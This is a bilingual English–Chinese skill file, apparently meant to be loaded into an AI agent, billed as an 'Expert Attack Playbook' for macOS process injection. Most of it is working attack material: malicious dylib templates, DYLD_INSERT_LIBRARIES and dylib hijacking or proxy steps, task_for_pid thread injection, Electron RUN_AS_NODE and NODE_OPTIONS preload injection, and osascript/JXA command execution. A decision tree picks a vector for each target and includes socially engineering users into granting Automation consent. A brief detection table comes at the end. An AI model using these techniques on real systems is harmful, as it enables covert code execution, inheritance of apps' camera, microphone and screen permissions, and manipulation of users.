macos-process-injection

Compare original and translation side by side

🇺🇸

Original

English

🇨🇳

Translation

Chinese

SKILL: macOS Process Injection — Expert Attack Playbook

SKILL: macOS 进程注入 —— 专家级攻击操作手册

AI LOAD INSTRUCTION: Expert macOS process injection techniques. Covers DYLD_INSERT_LIBRARIES, dylib hijacking (weak/rpath/proxy), XPC PID reuse attacks, Mach port manipulation, MIG abuse, and Electron injection. Base models miss entitlement prerequisites and SIP constraints on injection vectors.

AI 加载说明：专家级 macOS 进程注入技术，涵盖 DYLD_INSERT_LIBRARIES、dylib 劫持（weak/rpath/proxy 类）、XPC PID 复用攻击、Mach 端口操纵、MIG 滥用以及 Electron 注入。基础模型会遗漏注入向量所需的权限前提和 SIP 限制。

0. RELATED ROUTING

0. 相关关联指引

Before going deep, consider loading:

macos-security-bypass when you need to bypass TCC, Gatekeeper, or SIP protections blocking your injection
linux-privilege-escalation for Unix-layer escalation (shared object hijacking concepts apply)

深入学习前，可考虑加载以下内容：

macos-security-bypass：当你需要绕过 TCC、Gatekeeper 或 SIP 保护以完成注入时使用
linux-privilege-escalation：用于 Unix 层提权（共享对象劫持的概念可复用）

Advanced Reference

进阶参考

Also load DYLIB_XPC_TECHNIQUES.md when you need:

Step-by-step dylib hijacking methodology with tooling commands
XPC exploitation walkthrough with code examples
Mach port technique details and task_for_pid patterns

当你需要以下内容时，还可加载 DYLIB_XPC_TECHNIQUES.md：

附带工具命令的 dylib 劫持分步方法论
带代码示例的 XPC 漏洞利用实操指南
Mach 端口技术细节和 task_for_pid 用法模式

1. DYLD_INSERT_LIBRARIES INJECTION

1. DYLD_INSERT_LIBRARIES 注入

The most straightforward injection: set an environment variable that forces the dynamic linker to preload your dylib.

最直接的注入方式：设置环境变量强制动态链接器预加载你的 dylib。

1.1 Requirements and Restrictions

1.1 要求与限制

Condition	Can Inject?	Reason
Normal (non-hardened) binary	Yes	No restrictions
Hardened Runtime enabled	No	DYLD strips env vars
Hardened Runtime + `com.apple.security.cs.allow-dyld-environment-variables`	Yes	Entitlement explicitly allows it
Apple system binary (SIP-protected)	No	DYLD env vars stripped by SIP
SUID/SGID binary	No	DYLD env vars stripped for privilege safety
App Sandbox enabled	No	Sandbox blocks env var injection

条件	是否可注入	原因
普通（未硬化）二进制文件	是	无限制
启用 Hardened Runtime	否	DYLD 会清除环境变量
Hardened Runtime + `com.apple.security.cs.allow-dyld-environment-variables`	是	权限明确允许该操作
苹果系统二进制文件（受 SIP 保护）	否	DYLD 环境变量会被 SIP 清除
SUID/SGID 二进制文件	否	出于权限安全考虑，DYLD 环境变量会被清除
启用 App Sandbox	否	沙箱会阻止环境变量注入

1.2 Basic Injection

1.2 基础注入方法

bash

undefined

bash

undefined

Create malicious dylib

创建恶意 dylib

cat > inject.c << 'EOF' #include <stdio.h> attribute((constructor)) void inject() { printf("[+] Injected into PID %d\n", getpid()); // payload here } EOF

cat > inject.c << 'EOF' #include <stdio.h> attribute((constructor)) void inject() { printf("[+] Injected into PID %d\n", getpid()); // 此处放置 payload } EOF

Compile for both architectures

编译为双架构兼容版本

gcc -dynamiclib -o inject.dylib inject.c -arch x86_64 -arch arm64

Inject into target

注入到目标进程

DYLD_INSERT_LIBRARIES=./inject.dylib /path/to/target

undefined

DYLD_INSERT_LIBRARIES=./inject.dylib /path/to/target

undefined

1.3 Finding Injectable Targets

1.3 寻找可注入目标

bash

undefined

bash

undefined

Find apps WITHOUT hardened runtime

查找未启用 hardened runtime 的应用

find /Applications -name "*.app" -exec sh -c ' binary=$(defaults read "$1/Contents/Info.plist" CFBundleExecutable 2>/dev/null) if [ -n "$binary" ]; then flags=$(codesign -d --verbose "$1/Contents/MacOS/$binary" 2>&1) echo "$flags" | grep -q "runtime" || echo "No Hardened Runtime: $1" fi ' _ {} ;

Find apps with dyld env var entitlement

查找带有 dyld 环境变量权限的应用

find /Applications -name "*.app" -exec sh -c ' binary="$1/Contents/MacOS/"$(defaults read "$1/Contents/Info.plist" CFBundleExecutable 2>/dev/null) codesign -d --entitlements :- "$binary" 2>/dev/null |
grep -q "allow-dyld-environment-variables" && echo "DYLD injectable: $1" ' _ {} ;

---

---

2. DYLIB HIJACKING

2. DYLIB 劫持

Exploit the dynamic linker's library search order to load attacker-controlled dylibs instead of (or in addition to) legitimate ones.

利用动态链接器的库搜索顺序，加载攻击者控制的 dylib 替代（或附加于）合法 dylib。

2.1 Weak Dylib Hijacking (LC_LOAD_WEAK_DYLIB)

2.1 弱 Dylib 劫持（LC_LOAD_WEAK_DYLIB）

Weak dylibs are optional — if missing, the binary still runs. If you can place a dylib at the expected path, it loads.

bash

undefined

弱 dylib 是可选依赖——如果缺失，二进制文件仍可运行。如果你能在预期路径放置 dylib，就会被加载。

bash

undefined

Find binaries with weak dylib references

查找带有弱 dylib 引用的二进制文件

otool -l /path/to/binary | grep -A 2 LC_LOAD_WEAK_DYLIB

Check if the weak dylib actually exists

检查弱 dylib 是否实际存在

otool -L /path/to/binary | grep weak | while read lib rest; do [ ! -f "$lib" ] && echo "MISSING (hijackable): $lib" done

undefined

otool -L /path/to/binary | grep weak | while read lib rest; do [ ! -f "$lib" ] && echo "MISSING (hijackable): $lib" done

undefined

2.2 @rpath Hijacking

2.2 @rpath 劫持

@rpath

is resolved from

LC_RPATH

entries in the binary. If an earlier rpath directory is writable, you can place your dylib there.

bash

undefined

@rpath

会从二进制文件的

LC_RPATH

条目解析。如果靠前的 rpath 目录可写，你可以在该处放置你的 dylib。

bash

undefined

List rpath entries

列出 rpath 条目

otool -l /path/to/binary | grep -A 2 LC_RPATH

List rpath-relative dylib references

列出 rpath 相对路径的 dylib 引用

otool -L /path/to/binary | grep @rpath

If rpath includes writable directory (e.g., app's Frameworks/)

如果 rpath 包含可写目录（例如应用的 Frameworks/ 目录）

place malicious dylib with matching name there

在此处放置同名的恶意 dylib 即可

undefined

undefined

2.3 Dylib Proxying

2.3 Dylib 代理

Replace a legitimate dylib with a malicious one that forwards all exports to the original.

bash

undefined

将合法 dylib 替换为恶意 dylib，后者会将所有导出项转发到原始 dylib。

bash

undefined

Step 1: Identify target dylib and its exports

步骤 1：识别目标 dylib 及其导出项

nm -gU /path/to/original.dylib | awk '{print $3}'

Step 2: Create proxy dylib that re-exports everything

步骤 2：创建重新导出所有内容的代理 dylib

Move original to original_real.dylib

将原始 dylib 移动为 original_real.dylib

Create proxy:

创建代理：

cat > proxy.c << 'EOF' attribute((constructor)) void payload() { // malicious code here } EOF

gcc -dynamiclib -o hijacked.dylib proxy.c
-Wl,-reexport_library,/path/to/original_real.dylib
-arch x86_64 -arch arm64

undefined

cat > proxy.c << 'EOF' attribute((constructor)) void payload() { // 此处放置恶意代码 } EOF

gcc -dynamiclib -o hijacked.dylib proxy.c
-Wl,-reexport_library,/path/to/original_real.dylib
-arch x86_64 -arch arm64

undefined

2.4 Dependency Enumeration

2.4 依赖枚举

bash

otool -L /path/to/binary              # List all dylib dependencies
otool -l /path/to/binary              # Full load commands (rpaths, weak, etc.)
dyldinfo -print_dependencies /path/to/binary  # Detailed dependency info (pre-Ventura)

bash

otool -L /path/to/binary              # 列出所有 dylib 依赖
otool -l /path/to/binary              # 完整加载命令（rpath、弱依赖等）
dyldinfo -print_dependencies /path/to/binary  # 详细依赖信息（Ventura 之前版本可用）

3. XPC EXPLOITATION

3. XPC 漏洞利用

XPC (Cross-Process Communication) is macOS's primary IPC mechanism for privilege separation. Privileged XPC services are high-value targets.

XPC（跨进程通信）是 macOS 用于权限隔离的主要 IPC 机制，高权限 XPC 服务是高价值目标。

3.1 XPC Service Discovery

3.1 XPC 服务发现

bash

undefined

bash

undefined

System XPC services

系统 XPC 服务

find /System/Library -name "*.xpc" -type d 2>/dev/null | head -20

Third-party XPC services

第三方 XPC 服务

find /Library /Applications -name "*.xpc" -type d 2>/dev/null

LaunchDaemon XPC services (root-level)

LaunchDaemon XPC 服务（root 级别）

grep -r "MachServices" /Library/LaunchDaemons/.plist 2>/dev/null grep -r "MachServices" /System/Library/LaunchDaemons/.plist 2>/dev/null

undefined

grep -r "MachServices" /Library/LaunchDaemons/.plist 2>/dev/null grep -r "MachServices" /System/Library/LaunchDaemons/.plist 2>/dev/null

undefined

3.2 PID Reuse Attack

3.2 PID 复用攻击

XPC connections validated by PID are vulnerable to race conditions: attacker spawns process, PID is checked and passes, attacker's process exits, OS reuses PID for malicious process.

Validation Method	Vulnerable?	Notes
PID-based check	Yes	PID recycled after process exit
Audit token	No	Unique per process lifecycle, not recycled
Code signature check	No	Validates signing identity
Entitlement check	No	Checks process entitlements

Timeline of PID reuse attack:
1. Legitimate client (PID 1234) connects to XPC service
2. XPC service checks PID 1234 → valid
3. Legitimate client exits (PID 1234 freed)
4. Attacker rapidly forks to get PID 1234
5. Attacker's process (now PID 1234) sends malicious XPC message
6. XPC service trusts PID 1234 (cached validation)

通过 PID 验证的 XPC 连接存在竞态条件漏洞：攻击者生成进程，PID 检查通过后，攻击者进程退出，操作系统会将 PID 复用给恶意进程。

验证方法	是否存在漏洞	说明
基于 PID 检查	是	进程退出后 PID 会被回收
审计令牌	否	每个进程生命周期唯一，不会被回收
代码签名检查	否	会验证签名身份
权限检查	否	会检查进程权限

PID 复用攻击时间线：
1. 合法客户端（PID 1234）连接到 XPC 服务
2. XPC 服务检查 PID 1234 → 验证通过
3. 合法客户端退出（PID 1234 被释放）
4. 攻击者快速 fork 进程获取 PID 1234
5. 攻击者的进程（现在 PID 为 1234）发送恶意 XPC 消息
6. XPC 服务信任 PID 1234（缓存的验证结果）

3.3 XPC Client Validation Weaknesses

3.3 XPC 客户端验证弱点

Weakness	Description	Exploitation
No client validation	Service accepts any connection	Connect directly, send commands
PID-only validation	Race condition exploitable	PID reuse attack (§3.2)
Bundle ID check only	Bundle IDs can be spoofed	Create app with matching bundle ID
Partial code requirement	Missing anchor checks	Sign with any cert matching partial requirement
Entitlement check on wrong process	Checks parent instead of client	Spawn from entitled parent

弱点	描述	利用方式
无客户端验证	服务接受任意连接	直接连接，发送命令
仅验证 PID	可利用竞态条件	PID 复用攻击（§3.2）
仅检查 Bundle ID	Bundle ID 可伪造	创建匹配 Bundle ID 的应用
部分代码要求	缺失锚点检查	使用符合部分要求的任意证书签名
对错误进程做权限检查	检查父进程而非客户端	从有权限的父进程派生

4. MACH PORT MANIPULATION

4. MACH 端口操纵

Mach ports are the kernel-level IPC primitive underlying XPC. Direct Mach port access enables powerful injection.

Mach 端口是 XPC 底层的内核级 IPC 原语，直接访问 Mach 端口可实现强大的注入能力。

4.1 Task Port (task_for_pid)

4.1 任务端口（task_for_pid）

// Requires root or taskgated entitlement
mach_port_t task;
kern_return_t kr = task_for_pid(mach_task_self(), target_pid, &task);
if (kr == KERN_SUCCESS) {
    // Can now read/write target process memory
    // Can inject threads via thread_create_running
}

Access Method	Requirement	Post-Exploit Capability
`task_for_pid()`	Root + not SIP-protected target	Full memory R/W, thread injection
`processor_set_tasks()`	Root + `com.apple.system-task-ports`	Enumerate all task ports
Exception ports	Set via `task_set_exception_ports`	Catch target crashes, redirect execution
Thread injection	Task port obtained	Create new thread in target address space

// 需要 root 权限或 taskgated 权限
mach_port_t task;
kern_return_t kr = task_for_pid(mach_task_self(), target_pid, &task);
if (kr == KERN_SUCCESS) {
    // 现在可读写目标进程内存
    // 可通过 thread_create_running 注入线程
}

访问方法	要求	后利用能力
`task_for_pid()`	Root 权限 + 目标不受 SIP 保护	完整内存读写、线程注入
`processor_set_tasks()`	Root 权限 + `com.apple.system-task-ports`	枚举所有任务端口
异常端口	通过 `task_set_exception_ports` 设置	捕获目标崩溃，重定向执行流
线程注入	已获取任务端口	在目标地址空间创建新线程

4.2 Port Namespace Manipulation

4.2 端口命名空间操纵

Technique	Description
Port name guessing	Mach port names are sequential integers — brute-forceable in some contexts
`mach_port_insert_right`	Insert send right into target's namespace (requires task port)
Bootstrap server abuse	Register service name before legitimate service → intercept connections

技术	描述
端口名猜测	Mach 端口名是连续整数——在某些场景下可暴力破解
`mach_port_insert_right`	向目标命名空间插入发送权限（需要任务端口）
引导服务器滥用	先于合法服务注册服务名→拦截连接

5. MIG (MACH INTERFACE GENERATOR) ABUSE

5. MIG（MACH 接口生成器）滥用

MIG generates C stubs for Mach IPC. MIG servers may have vulnerabilities in their dispatch routines.

MIG 为 Mach IPC 生成 C 存根，MIG 服务器的调度例程可能存在漏洞。

5.1 Analysis Approach

5.1 分析方法

bash

undefined

bash

undefined

Find MIG subsystems in a binary

查找二进制文件中的 MIG 子系统

nm /path/to/binary | grep _subsystem strings /path/to/binary | grep "MIG"

Identify MIG routine dispatch tables

识别 MIG 例程调度表

otool -tV /path/to/binary | grep -A 5 "server_routine"

undefined

otool -tV /path/to/binary | grep -A 5 "server_routine"

undefined

5.2 Common MIG Vulnerabilities

5.2 常见 MIG 漏洞

Vulnerability	Description
Missing audit token validation	MIG handler doesn't verify sender identity
Type confusion	MIG deserialization trusts client-provided type descriptors
Port lifecycle issues	Use-after-deallocate on Mach ports between MIG calls
OOL (out-of-line) memory abuse	Oversized OOL descriptors → kernel memory issues

漏洞	描述
缺失审计令牌验证	MIG 处理程序不验证发送者身份
类型混淆	MIG 反序列化信任客户端提供的类型描述符
端口生命周期问题	MIG 调用之间 Mach 端口释放后使用
OOL（带外）内存滥用	超大 OOL 描述符→内核内存问题

6. ELECTRON / CHROMIUM INJECTION

6. ELECTRON / CHROMIUM 注入

Many macOS apps use Electron (Slack, Discord, VS Code, Teams, etc.). Electron apps expose multiple injection surfaces.

很多 macOS 应用使用 Electron（Slack、Discord、VS Code、Teams 等），Electron 应用暴露了多个注入面。

6.1 ELECTRON_RUN_AS_NODE

bash

undefined

bash

undefined

Turns Electron app into a plain Node.js runtime

将 Electron 应用转为普通 Node.js 运行时

ELECTRON_RUN_AS_NODE=1 "/Applications/Slack.app/Contents/MacOS/Slack" -e
"require('child_process').execSync('id').toString()"

This inherits the app's TCC permissions!

这会继承应用的 TCC 权限！

If Slack has camera/mic/screen recording, your code gets it too.

如果 Slack 有摄像头/麦克风/录屏权限，你的代码也会获得这些权限。

undefined

undefined

6.2 Debugging Flags

6.2 调试标志

bash

undefined

bash

undefined

Open Chrome DevTools protocol on the app

在应用上开启 Chrome DevTools 协议

"/Applications/Target.app/Contents/MacOS/Target" --inspect=9229

Then connect: chrome://inspect in Chrome browser

然后在 Chrome 浏览器访问 chrome://inspect 连接

Break before any code runs

在任何代码运行前中断

"/Applications/Target.app/Contents/MacOS/Target" --inspect-brk=9229

undefined

"/Applications/Target.app/Contents/MacOS/Target" --inspect-brk=9229

undefined

6.3 NODE_OPTIONS Injection

6.3 NODE_OPTIONS 注入

bash

undefined

bash

undefined

Inject preload script via NODE_OPTIONS

通过 NODE_OPTIONS 注入预加载脚本

echo 'require("child_process").execSync("id > /tmp/pwned")' > /tmp/preload.js NODE_OPTIONS="--require /tmp/preload.js" "/Applications/Target.app/Contents/MacOS/Target"

undefined

echo 'require("child_process").execSync("id > /tmp/pwned")' > /tmp/preload.js NODE_OPTIONS="--require /tmp/preload.js" "/Applications/Target.app/Contents/MacOS/Target"

undefined

6.4 Electron Fuses

6.4 Electron 熔丝

Modern Electron apps use "fuses" to disable dangerous features. Check fuse state:

Fuse	When Enabled (secure)	When Disabled (exploitable)
`RunAsNode`	ELECTRON_RUN_AS_NODE stripped	Can use app as Node.js
`EnableNodeCliInspectArguments`	--inspect flags stripped	Can attach debugger
`EnableNodeOptionsEnvironmentVariable`	NODE_OPTIONS stripped	Can inject preload
`OnlyLoadAppFromAsar`	Only loads from .asar	Can replace JS files

bash

undefined

现代 Electron 应用使用“熔丝”禁用危险功能，可检查熔丝状态：

熔丝	启用时（安全）	禁用时（可利用）
`RunAsNode`	ELECTRON_RUN_AS_NODE 被剔除	可将应用作为 Node.js 使用
`EnableNodeCliInspectArguments`	--inspect 标志被剔除	可附加调试器
`EnableNodeOptionsEnvironmentVariable`	NODE_OPTIONS 被剔除	可注入预加载脚本
`OnlyLoadAppFromAsar`	仅从 .asar 加载	可替换 JS 文件

bash

undefined

Check electron fuse status (requires npx @electron/fuses)

检查 electron 熔丝状态（需要 npx @electron/fuses）

npx @electron/fuses read --app "/Applications/Target.app"

---

npx @electron/fuses read --app "/Applications/Target.app"

---

7. APPLICATION SCRIPTING (APPLE EVENTS)

7. 应用脚本（APPLE EVENTS）

bash

undefined

bash

undefined

Inject via osascript (if Automation permission exists)

通过 osascript 注入（如果存在自动化权限）

osascript -e 'tell application "Terminal" to do script "id > /tmp/pwned"'

JavaScript for Automation (JXA)

自动化 JavaScript（JXA）

osascript -l JavaScript -e ' var app = Application("Terminal"); app.doScript("id > /tmp/pwned"); '

JXA with ObjC bridge (powerful)

带 ObjC 桥接的 JXA（功能强大）

osascript -l JavaScript -e ' ObjC.import("Cocoa"); var task = $.NSTask.alloc.init; task.launchPath = "/bin/bash"; task.arguments = ["-c", "id > /tmp/pwned"]; task.launch; '

---

osascript -l JavaScript -e ' ObjC.import("Cocoa"); var task = $.NSTask.alloc.init; task.launchPath = "/bin/bash"; task.arguments = ["-c", "id > /tmp/pwned"]; task.launch; '

---

8. PROCESS INJECTION DECISION TREE

8. 进程注入决策树

Need to inject code into macOS process
│
├── Target uses Electron?
│   ├── Fuses disabled? → ELECTRON_RUN_AS_NODE (§6.1)
│   ├── Debugging available? → --inspect flag (§6.2)
│   ├── NODE_OPTIONS not stripped? → preload injection (§6.3)
│   └── All fuses on? → check dylib path or XPC
│
├── Target has dylib env var entitlement?
│   └── Yes → DYLD_INSERT_LIBRARIES (§1)
│
├── Target has missing or weak dylib?
│   ├── LC_LOAD_WEAK_DYLIB with missing lib? → place dylib (§2.1)
│   ├── @rpath with writable dir first in search? → rpath hijack (§2.2)
│   └── Existing dylib in writable location? → dylib proxy (§2.3)
│
├── Target exposes XPC service?
│   ├── No client validation? → connect directly (§3.3)
│   ├── PID-only validation? → PID reuse attack (§3.2)
│   └── Audit token validation? → need different vector
│
├── Have root access?
│   ├── Target not SIP-protected? → task_for_pid injection (§4.1)
│   └── SIP-protected? → need SIP bypass first (→ macos-security-bypass)
│
├── Can use Apple Events?
│   ├── Automation permission for target? → osascript injection (§7)
│   └── No permission? → social engineer Automation consent
│
└── None of the above?
    ├── Check for MIG server vulnerabilities (§5)
    └── Look for bootstrap server name collision (§4.2)

需要向 macOS 进程注入代码
│
├── 目标使用 Electron?
│   ├── 熔丝已禁用? → ELECTRON_RUN_AS_NODE (§6.1)
│   ├── 可调试? → --inspect 标志 (§6.2)
│   ├── NODE_OPTIONS 未被剔除? → 预加载注入 (§6.3)
│   └── 所有熔丝已开启? → 检查 dylib 路径或 XPC
│
├── 目标有 dylib 环境变量权限?
│   └── 是 → DYLD_INSERT_LIBRARIES (§1)
│
├── 目标有缺失或弱 dylib?
│   ├── LC_LOAD_WEAK_DYLIB 指向缺失的库? → 放置 dylib (§2.1)
│   ├── @rpath 搜索顺序中靠前的目录可写? → rpath 劫持 (§2.2)
│   └── 现有 dylib 位于可写位置? → dylib 代理 (§2.3)
│
├── 目标暴露 XPC 服务?
│   ├── 无客户端验证? → 直接连接 (§3.3)
│   ├── 仅验证 PID? → PID 复用攻击 (§3.2)
│   └── 审计令牌验证? → 需要其他攻击向量
│
├── 有 root 权限?
│   ├── 目标不受 SIP 保护? → task_for_pid 注入 (§4.1)
│   └── 受 SIP 保护? → 先绕过 SIP（→ macos-security-bypass）
│
├── 可使用 Apple Events?
│   ├── 有目标的自动化权限? → osascript 注入 (§7)
│   └── 无权限? → 社会工程获取自动化授权
│
└── 以上都不满足?
    ├── 检查 MIG 服务器漏洞 (§5)
    └── 寻找引导服务器名称冲突 (§4.2)

9. DETECTION & FORENSICS

9. 检测与取证

Artifact	Where to Look
DYLD_INSERT_LIBRARIES use	Process environment ( `/proc/PID/environ` , `ps eww` )
Unexpected dylibs loaded	`vmmap PID` or `DYLD_PRINT_LIBRARIES=1` output
XPC connection anomalies	Endpoint Security `es_event_type_t` XPC events
Electron debug port open	`lsof -i :9229`
osascript execution	Unified log: `log show --predicate 'process=="osascript"'`
Unsigned code execution	`codesign --verify` failures, Gatekeeper logs

痕迹	查找位置
DYLD_INSERT_LIBRARIES 使用记录	进程环境（ `/proc/PID/environ` 、 `ps eww` ）
加载的异常 dylib	`vmmap PID` 或 `DYLD_PRINT_LIBRARIES=1` 输出
XPC 连接异常	Endpoint Security `es_event_type_t` XPC 事件
Electron 调试端口开启	`lsof -i :9229`
osascript 执行记录	统一日志： `log show --predicate 'process=="osascript"'`
未签名代码执行	`codesign --verify` 失败记录、Gatekeeper 日志